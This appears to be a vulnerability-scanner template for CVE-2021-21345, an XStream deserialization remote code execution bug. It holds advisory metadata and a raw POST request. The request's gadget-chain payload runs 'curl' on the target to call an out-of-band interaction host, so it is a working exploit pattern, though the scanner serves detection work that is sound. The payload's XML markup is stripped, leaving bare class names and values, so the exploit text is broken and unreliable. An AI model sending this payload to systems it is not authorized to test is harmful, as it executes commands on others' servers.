id: CVE-2021-21345 info: name: XStream <1.4.16 - Remote Code Execution author: pwnhxl,vicrack severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: - https://x-stream.github.io/CVE-2021-21345.html - http://x-stream.github.io/changes.html#1.4.16 - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4 - https://nvd.nist.gov/vuln/detail/CVE-2021-21345 remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-21345 cwe-id: CWE-78 epss-score: 0.46618 tags: cve,cve2021,xstream,deserialization,rce,oast metadata: max-request: 1 http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml

2 com.sun.corba.se.impl.activation.ServerTableEntry com.sun.corba.se.impl.activation.ServerTableEntry verify

true 1 UTF-8 curl http://{{interactsh-url}} 3 javax.xml.ws.binding.attachments.inbound javax.xml.ws.binding.attachments.inbound

matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: curl"